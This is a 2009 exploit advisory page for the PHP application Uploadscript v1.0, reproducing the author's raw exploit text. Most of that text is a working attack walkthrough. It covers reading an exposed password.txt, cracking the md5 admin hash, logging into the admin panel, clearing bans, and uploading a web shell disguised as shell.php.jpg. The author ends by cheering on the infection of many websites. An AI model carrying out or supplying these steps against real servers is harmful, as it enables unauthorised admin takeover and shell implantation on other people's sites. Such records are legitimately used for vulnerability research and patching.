Uploadscript v1.0. Multiple Vulnerabilities

vendor:

Uploadscript v1.0.

by:

Mr.aFiR

7.5

CVSS

HIGH

Admin-password / Shell Upload

N/A

CWE

Product Name: Uploadscript v1.0.

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: GNU/LINUX

2009

Uploadscript v1.0. Multiple Vulnerabilities

This exploit allows an attacker to gain access to the admin panel of the Uploadscript v1.0. application by decrypting the md5 hash password found in the password.txt file. Once the attacker has access to the admin panel, they can upload a malicious shell to the upload directory and execute it.

Mitigation:

Ensure that the password.txt file is not accessible to the public and that the admin panel is protected with a strong password.

Source

Exploit-DB raw data:

# Exploit Title: Uploadscript v1.0. Multiple Vulnerabilities
# Date: 13-12-2009
# Author: Mr.aFiR
# Software Link: http://www.phpstudio.hu/?action=verify&categorize=php&subaction=php&context=php&ID=75&verify=0
# Version: N/A
# Tested on: GNU/LINUX
# CVE : N/A
# Code : N/A
#####################################################################

#####################################################################
##                                _______   ____                   ##
##          __ ___               / _____ \ /  __ \                 ##
##         /      \  _ _     ___ | |___ |/ | |  ) )                ##
##        |  Y  Y  \| V_\   / _ Y|  __ |(_)| |_/ /      [A]        ##
##        |__|__|__ \ |  ()| (_] | |  \|| ||  __ \                 ##
##                 \/_/     \___ | |    | || |  ) |                ##
##                              \|/     |_/|_/  |/                 ##
##                                                                 ##
#####################################################################
##          Uploadscript v1.0. Multiple Vulnerabilities            ##
##                [Admin-password / Shell Upload]                  ##
##              Created By Mr.aFiR (Moroccan Hacker)               ##
##            Email: q-_@hotmail.com / ax@hotmail.com              ##
##                     Website: www.aFiR.me                        ##
##                      (c) -- 13/12/2oo9                          ##
#####################################################################
##                      * How to use it ?                          ##
##                      -----------------                          ##
## ~ Go to : > http://site/path/password.txt                       ##
##           > You will find a Hash(md5) password !                ##
##           > Decrypte this password !                            ##
##           > Now! Go to : /path/admin.php                        ##
##           > Write the password & Login to AdminCP               ##
##           > Go to : /path/admin.php?act=bans                    ##
##           > Delete All Bans                                     ##
##           > Now! Go to : /path/index.php                        ##
##           > Upload your shell as : shell.php.jpg                ##
##           > Uploaded Files Directory is : /path/storagedata/    ##
##           > Your Link is:                                       ##
##                     http://server/path/storagedata/[Shell]      ##
##           > -------------------------------------------------   ##
##           > Enjoy With it, You Will Find a lot of infected      ##
##             websites. & Remember me ;)                          ##
#####################################################################
## ~ GreatZ To : > Dr.Crypter - Dr.BoB-Hacker - Love511 & All ...  ##
## ~ Contact   : > q-_[at]Hotmail[dot]com - www[dot]aFiR[dot]me    ##
##                        I Love You ****                          ##
#####################################################################